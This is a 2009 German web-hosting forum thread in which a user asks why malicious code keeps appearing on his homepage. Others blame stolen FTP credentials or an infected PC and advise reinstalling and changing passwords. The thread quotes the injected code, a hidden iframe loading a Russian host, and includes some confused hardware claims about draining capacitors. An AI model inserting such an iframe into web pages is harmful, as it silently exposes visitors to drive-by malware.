kostenloser Webspace werbefrei: lima-city


Virus greift über FTP zu

lima-cityForumDie eigene HomepageSicherheit im Internet

  1. Autor dieses Themas

    privatecitypage

    Kostenloser Webspace von privatecitypage

    privatecitypage hat kostenlosen Webspace.

    Lima ist Hack Sicher!

    Wie kommt das dann, das sich wieder diese Virus Code auf Meiner Homepage sehen ließ?

    Jetzt war das sogar ein Russicher!


    Kann mir das einer erklären?


    eh Leute ich mah kein Scherz mehr

    <iframe src="http://u6d.ru:8080/index.php" width=199 height=182 style="visibility: hidden"></iframe>


    das (oben) ist der Code!



    Beitrag zuletzt geändert: 14.7.2009 13:09:17 von privatecitypage
  2. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

  3. ich würd mal eher behaupten dass es an deiner Seite liegt und nicht an Lima-City
  4. privatecitypage schrieb:
    Lima ist Hack Sicher!

    Wie kommt das dann, das sich wieder diese Virus Code auf Meiner Homepage sehen ließ?

    Jetzt war das sogar ein Russicher!


    Kann mir das einer erklären?





    Jop das wird wohl eher an dir liegen als an Lima. Ansonsten wäre es mittlerweile auf allen von Lima gehosteten Seiten.
    Also überprüfe lieber, ob du dein Passwort in nem FTP-Programm speichern lassen hast, dieses auch sicher ist und die keinen Keylogger besitzt.
  5. Autor dieses Themas

    privatecitypage

    Kostenloser Webspace von privatecitypage

    privatecitypage hat kostenlosen Webspace.

    Ich habe ein 34 Zeichen Passwort!

    Reicht das nicht?
  6. lima-city.de ist Hacksicher ! Das was du auf deiner Seite da machst ist doch nicht ein Problem von Lima oder ?!!!!!

    privatecitypage schrieb:
    Ich habe ein 34 Zeichen Passwort!

    Reicht das nicht?


    Ja und ? Man muss dafür nicht ueber Lima City auf dein Webspace zugreifen. Aber mehr kann ich dazu auch nicht sagen, kenne mich da nicht aus ! XSS und so.



    Beitrag zuletzt geändert: 14.7.2009 13:15:57 von kevsworld
  7. Ich nehme mal an, dein Rechner war eben doch nicht bereinigt das letzte Mal.
    So viel auf lima auch für die Sicherheit getan wird, es bringt nur was, wenn der User auch seinen Teil zur Sicherheit beiträgt.
    Wenn du beim letzten Virus keine Neuinstallation durchgeführt hast und das ganze System neu aufgesetzt hattest, dann könnte noch was auf deinem PC hängen geblieben sein.
  8. Dazu sollte man anmerken, dass laut Statistik (Ok, Stand 06, aber Tendenz müsste immernoch stimmen) von Russland aus weniger Vieren und Hackerangriffe ausgehen als von Deutschland! (Schwer zu glauben aber wahr).
    Wenn man sich alleine mal die Abzock Seiten anschaut, soetwas gibts in Russland garnicht in dem Maße...
    (Die Statistik führen die USA an...)

    Zudem bringt, wie schon genannt wurde, ein sicheres Passwort nur solange etwas, wie es auch nur von einem sicheren PC aus eigegeben wird und zudem nirgends gespeichert ist.

    Eine weitere Quelle für derartigen Code kann die Verwendung eines unbekannten CMS sein, welches soetwas nachträglich einläd oder die verwendung von HTML-Templates oder "Snippets" die man nicht versteht und überblickt...
    Und wenn soetwas nicht zum ersten mal passiert ist, dann sollte man sich ernsthaft gedanken über die Verwendung und dem Umgang mit dem PC sowie dem Internet und speziell dem Downloaden von Software machen...
    (Rapidshare ist keine geprüfte Quelle, was software angeht. Es ist nicht unüblich, dass derartige Software über Trojaner usw usf. verfügt...)
  9. @privatecitypage: Erstmal würde ich es dir dringends empfehlen keine rechtsradikalen Bemerkungen zu machen. Insbesondere da du Pole bist, solltest du nichts gegen Russen oder Türken sagen, da du genau den selben Ruf genießt. In einem etwas strengerem Forum wärst du dafür geflogen.

    Weiterhin: Das ist eindeutig dein Fehler. Du scheinst dich wohl öfters auf Seiten herum zu treiben, auf denen man sich nicht herumtreibt und scheinst dir Sachen zu laden und zu installieren, die man nicht zu installieren hat. Setze dein Windows der Einfachkeit halber neu auf, man weiß nie wie viel übrig bleibt, insbesondere, da es schon dein zweites Mal ist. Danach einfach versuchen keine gesetzlich umstrittenen Seiten zu besuchen (ich unterstelle dir nicht unbedingt illegal Software oder Filme zu erwerben, weder die Nutzung von pornographischen Angeboten, aber das sind bekanntlich die Quellen aller Viren).
  10. privatecitypage schrieb:
    Ich habe ein 34 Zeichen Passwort!

    Reicht das nicht?

    Ein langes PW ist zwar schwerer zu knacken, aber nicht schwerer zu stehlen. ;)

    Karpfen hat schon recht. Putz deine Festplatte und installiere das Betriebssystem neu. Einen Virus/Trojaner/Wurm manuell zu entfernen ist nur eine Option, wenn man den Schädling genau kennt und sich wirklich mit der Thematik auskennt.
    Der erneute Vorfall beweist, daß dies bei dir anscheinend nicht der Fall ist. ;)

    ToDo-List für dich:
    - Webspace leeren.
    - Festplatte(n) vollständig leeren. (alle Partitionen löschen)
    - Betriebssystem von Original-CD installieren.
    - einen guten Virenschutz installieren.
    - Virenschutz auf den neusten Stand bringen.
    - Betriebssystem auf den neuesten Stand bringen.
    - eventuell zusätzliche Sicherheitstools
    - Alle Passwörter ändern.
    - benötigte Software installieren (Programme aus dubiosen Quellen vergessen!)


    Benutze deinen FTP-Client erst wieder danach,

    nicic schrieb:
    Danach einfach versuchen keine gesetzlich umstrittenen Seiten zu besuchen

    Wenn es immer so einfach wäre. Ein Besuch seiner eigenen Homepage reicht momentan. ;)

    FF

    Beitrag zuletzt geändert: 14.7.2009 13:54:17 von fatfreddy
  11. Autor dieses Themas

    privatecitypage

    Kostenloser Webspace von privatecitypage

    privatecitypage hat kostenlosen Webspace.

    fatfreddy schrieb:
    privatecitypage schrieb:
    Ich habe ein 34 Zeichen Passwort!

    Reicht das nicht?

    Ein langes PW ist zwar schwerer zu knacken, aber nicht schwerer zu stehlen. ;)

    Karpfen hat schon recht. Putz deine Festplatte und installiere das Betriebssystem neu. Einen Virus/Trojaner/Wurm manuell zu entfernen ist nur eine Option, wenn man den Schädling genau kennt und sich wirklich mit der Thematik auskennt.
    Der erneute Vorfall beweist, daß dies bei dir anscheinend nicht der Fall ist. ;)

    ToDo-List für dich:
    - Webspace leeren.
    - Festplatte(n) vollständig leeren. (alle Partitionen löschen)
    - Betriebssystem von Original-CD installieren.
    - einen guten Virenschutz installieren.
    - Virenschutz auf den neusten Stand bringen.
    - Betriebssystem auf den neuesten Stand bringen.
    - eventuell zusätzliche Sicherheitstools
    - Alle Passwörter ändern.
    - benötigte Software installieren (Programme aus dubiosen Quellen vergessen!)


    Benutze deinen FTP-Client erst wieder danach,

    nicic schrieb:
    Danach einfach versuchen keine gesetzlich umstrittenen Seiten zu besuchen

    Wenn es immer so einfach wäre. Ein Besuch seiner eigenen Homepage reicht momentan. ;)

    FF


    Ich habe mehr gemacht :-D!

    Ich habe
    - Mein Hidden Sector kaputt gemacht!
    - Meine Arbeitsspeicher Karten entfernt!
    - Meine Bios Batteri Raus genommen!
    - Und dann PC Gestartet!
    - Alles wieder eingesteckt und dann Bios eingestellt!
    - und dann was du gesagt hast!

    Eigentlich bin ich immer auf der Sicheren Seite!

    Wenn ich Neue Antiviren Sehe kaufe oder Downloade ich mir die und Installiere die!

    Hab mir Norton 360 Gekauft und das lief die Ganze zeit auf Meinen PC, wie man noch Sicherer Sein?
    @nikic
    Nun ja ich gebe zu ich habe etwas über reagiert!
    Aber du hast recht , Sorry!
    Wo hab ich was gegen Türken gesagt?

    Und das Kenwwort habe ich mit einen Generator machen lassen!

    Hier!

  12. c****s

    kevsworld schrieb:
    lima-city.de ist Hacksicher


    Es existiert im weiten, weiten Web kein einziger Host, keine einzige Anwendung, kein einziger Ort, der 100% gegen Angriffe gefeit ist. Die Aussage "Host ABC ist hacksicher" ist wie wenn man sagt "Mit der Automarke XYZ kann man keine Unfälle bauen". . .
  13. Autor dieses Themas

    privatecitypage

    Kostenloser Webspace von privatecitypage

    privatecitypage hat kostenlosen Webspace.

    Wieso heißt das dann Hack sicher?

  14. @census: So pauschal ohne ein Jahr konkrete Nachforschung mit viel Rechenarbeit würde ich das nicht sagen. Wenn du Floodingsicherheit mit einschließt, dann stimmt deine Aussage natürlich. Wenn du aber nur wirklich sicherheitsrelevantes "Hacking" meinst, also Zugriff auf Datenbanken, Script, Ausgaben, Betriebssystem usw. dann muss deine Aussage nicht zwangsläufig richtig sein. Wenn ich mich nicht ganz irre, dann gibt es Möglichkeiten die korrekte Funktionsweise eines Programms zu "beweisen". Wird afaik bei kritischen Dingen wie Autopiloten von Flugzeugen oder Raketen auch gemacht. Daher könnte man auch die Korrektheit eines kleineren Betriebsystems beweisen und dann wäre es nicht "hackbar".

    (Okey, beweisen etwas übertrieben, wäre ja ein Verstoß gegen das Goedel’sche Theorem, ich meine beweisen im nicht absolut streng mathematischem Sinne...)

    Beitrag zuletzt geändert: 14.7.2009 20:48:36 von nikic
  15. nikic schrieb:
    Wenn ich mich nicht ganz irre, dann gibt es Möglichkeiten die korrekte Funktionsweise eines Programms zu "beweisen". Wird afaik bei kritischen Dingen wie Autopiloten von Flugzeugen oder Raketen auch gemacht.


    Und trotzdem fallen sie runter. q.e.d.

    FF
  16. kalinawalsjakoff

    Kostenloser Webspace von kalinawalsjakoff

    kalinawalsjakoff hat kostenlosen Webspace.

    Also ich würde dir zusätzlich zum neu Aufsetzen deines Betriebssytsmes noch folgenden Rat geben: Lösche dein Betriebesystem und gehe nochmal mit einem sogenannten Datenschredder über deine Festplatte. Meistens wird beim löschen des Betriebssystems nur die ersten Sektoren der Platte gelöscht und der Rest der Platte als "Leer" markiert obwohl noch Daten drauf sind.

    Ich selber hatte auch mal ein Problem mit einem Virus, den ich durch einfaches Neuaufsetzen von Windows nicht losgekriegt habe. Erst das vollständige Löschen der PLatte mit Steganos hat geholfen.
  17. Ich würde mir aber schnleunigst mal meine Festplatte bereinigen lassen!

    Am besten du tust sie auf Fabrikneu formatieren!
    Das hast du eigentlich auch jeden kleinen Mist der vorher drauf war beseitigt.

    Nehme am besten "DelDisk", das ist super einfach zu bedienen!

    Lg
  18. Autor dieses Themas

    privatecitypage

    Kostenloser Webspace von privatecitypage

    privatecitypage hat kostenlosen Webspace.

    Mhh wieso habt ihr nicht die Konversatorenauf den Motherboad Leer gemacht?

    Also ich habe meine Konversatoren mit Hilfe eines Mess gäretes einfach mal Leere gemacht!

    :-)


    Mhh weiß nicht wie man das Word Konversatoren richtig Schreibt!

    Beitrag zuletzt geändert: 15.7.2009 11:45:48 von privatecitypage
  19. privatecitypage schrieb:
    Mhh wieso habt ihr nicht die Konversatorenauf den Motherboad Leer gemacht?

    Also ich habe meine Konversatoren mit Hilfe eines Mess gäretes einfach mal Leere gemacht!

    :-)


    A. Die Dinger heissen "Kondensatoren"

    B. Die Dinger sind leer, sobald man das Gerät ausschaltet, respk. wenige Sekunden danach bzw. das Gerät vom Netz trennen...

    C. Mit einem Messgerät kann man die ohnehinn nicht "leeren", da man sie in eingebauter Form erst garnicht messen kann

    D. Ist das paranoid, da man nie Probleme mit Vieren hat, wenn man sich an einfache Grundregeln hält.
  20. Autor dieses Themas

    privatecitypage

    Kostenloser Webspace von privatecitypage

    privatecitypage hat kostenlosen Webspace.

    Mh du sagst also die Zahlen die ich gesehen hab , die bis 0 gingen waren gefälscht?

    Und Danke das du es Richtig Geschrieben hast ;-)! Kondensatoren
  21. Jap, der Virus ist durch den Kondensator aufs Messgerät übergesprungen und hat dessen MicroController Baustein mit dem gemeingefährlichen M$ Windows Virus infiziert! Daher zählte das Messgerät dann die Threads, welche noch Aktiv waren, was bei einem Bluescreen meist gegen 0 läuft...
    Daher ist es sinnvoll, die Kondensatoren zuerst auszulöten, dann zu leeren und dann wieder einzubauen

    :-P Ne, mal Spaß beiseite, wenn man ein digitales Meßgerät verwendet, meist noch mit automatischer Bereichswahl, dann tickert das immer langsam runter, bis es 0 Erreicht, da es die jeweiligen kalibrierten Bereiche durchgeht und halt bei einem bestimmten anfängt und dann je nach abweichung einen weitere Bereich wählt.
    Das gilt für Kondensatoren, Spannungen und Wiederstände und hängt vorallem von der Geschwindigkeit des Messgerätes ab. Es ist manchmal verwunderlich, wie träge die sind...

    Wie aber bereits 1000mal erwähnt, würde ich mich nicht mit solchen belanglosigkeiten rummschlagen, sondern die Basics der Computerei wiederholen, die sind nämlich wichtig... sehr wichtig!
  22. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

Dir gefällt dieses Thema?

Über lima-city

Login zum Webhosting ohne Werbung!